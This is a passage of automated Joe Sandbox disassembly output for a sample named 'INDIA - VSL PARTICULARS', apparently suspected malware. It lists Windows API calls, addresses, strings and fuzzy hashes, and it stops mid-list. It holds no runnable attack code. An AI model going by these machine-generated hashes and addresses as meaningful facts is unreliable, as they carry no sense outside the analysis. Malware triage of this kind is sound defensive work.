                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsicoll$ClassMessageNameParentSend
                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                              • API String ID: 3125838495-3381328864
                              • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                              • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                              • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                              • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                              APIs
                              • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                              • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                              • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                              • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                              • SendMessageW.USER32(?,00000402,?), ref: 00449399
                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$CharNext
                              • String ID:
                              • API String ID: 1350042424-0
                              • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                              • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                              • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                              • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                              APIs
                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                              • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                              • _wcscpy.LIBCMT ref: 004787E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                              • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                              • API String ID: 3052893215-2127371420
                              • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                              • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                              • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                              • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                              APIs
                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                              • __swprintf.LIBCMT ref: 0045E7F7
                              • _wprintf.LIBCMT ref: 0045E8B3
                              • _wprintf.LIBCMT ref: 0045E8D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 2295938435-2354261254
                              • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                              • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                              • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                              • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __swprintf_wcscpy$__i64tow__itow
                              • String ID: %.15g$0x%p$False$True
                              • API String ID: 3038501623-2263619337
                              • Opcode ID: 938062b866bf0b218a40f47176acdf1de3dbe8e0b1755ce811117c76df3177ab
                              • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                              • Opcode Fuzzy Hash: 938062b866bf0b218a40f47176acdf1de3dbe8e0b1755ce811117c76df3177ab
                              • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                              APIs
                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                              • __swprintf.LIBCMT ref: 0045E5F6
                              • _wprintf.LIBCMT ref: 0045E6A3
                              • _wprintf.LIBCMT ref: 0045E6C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 2295938435-8599901
                              • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                              • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                              • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                              • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                              APIs
                              • timeGetTime.WINMM ref: 00443B67
                                • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                              • Sleep.KERNEL32(0000000A), ref: 00443B9F
                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                              • SetActiveWindow.USER32(00000000), ref: 00443BEC
                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                              • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                              • Sleep.KERNEL32(000000FA), ref: 00443C2D
                              • IsWindow.USER32(00000000), ref: 00443C3A
                              • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                              • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                              • String ID: BUTTON
                              • API String ID: 1834419854-3405671355
                              • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                              • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                              • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                              • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                              • LoadStringW.USER32(00000000), ref: 00454040
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • _wprintf.LIBCMT ref: 00454074
                              • __swprintf.LIBCMT ref: 004540A3
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                              • API String ID: 455036304-4153970271
                              • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                              • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                              • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                              • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                              APIs
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                              • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                              • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                              • _memmove.LIBCMT ref: 00467EB8
                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                              • _memmove.LIBCMT ref: 00467F6C
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                              • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                              • String ID:
                              • API String ID: 2170234536-0
                              • Opcode ID: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                              • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                              • Opcode Fuzzy Hash: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                              • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                              APIs
                              • GetKeyboardState.USER32(?), ref: 00453CE0
                              • SetKeyboardState.USER32(?), ref: 00453D3B
                              • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                              • GetKeyState.USER32(000000A0), ref: 00453D75
                              • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                              • GetKeyState.USER32(000000A1), ref: 00453DB5
                              • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                              • GetKeyState.USER32(00000011), ref: 00453DEF
                              • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                              • GetKeyState.USER32(00000012), ref: 00453E26
                              • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                              • GetKeyState.USER32(0000005B), ref: 00453E5D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                              • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                              • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                              • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                              APIs
                              • GetDlgItem.USER32(?,00000001), ref: 004357DB
                              • GetWindowRect.USER32(00000000,?), ref: 004357ED
                              • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                              • GetDlgItem.USER32(?,00000002), ref: 0043586A
                              • GetWindowRect.USER32(00000000,?), ref: 0043587C
                              • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                              • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                              • GetWindowRect.USER32(00000000,?), ref: 004358EE
                              • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                              • GetDlgItem.USER32(?,000003EA), ref: 00435941
                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$ItemMoveRect$Invalidate
                              • String ID:
                              • API String ID: 3096461208-0
                              • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                              • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                              • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                              • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                              APIs
                              • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                              • DeleteObject.GDI32(?), ref: 0047151E
                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                              • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                              • DeleteObject.GDI32(?), ref: 004715EA
                              • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                              • String ID:
                              • API String ID: 3218148540-0
                              • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                              • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                              • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                              • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                              • String ID:
                              • API String ID: 136442275-0
                              • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                              • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                              • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                              • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                              APIs
                              • _wcsncpy.LIBCMT ref: 00467490
                              • _wcsncpy.LIBCMT ref: 004674BC
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • _wcstok.LIBCMT ref: 004674FF
                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                              • _wcstok.LIBCMT ref: 004675B2
                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                              • _wcslen.LIBCMT ref: 00467793
                              • _wcscpy.LIBCMT ref: 00467641
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcslen.LIBCMT ref: 004677BD
                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                              • String ID: X
                              • API String ID: 3104067586-3081909835
                              • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                              • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                              • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                              • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                              APIs
                              • OleInitialize.OLE32(00000000), ref: 0046CBC7
                              • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                              • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                              • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
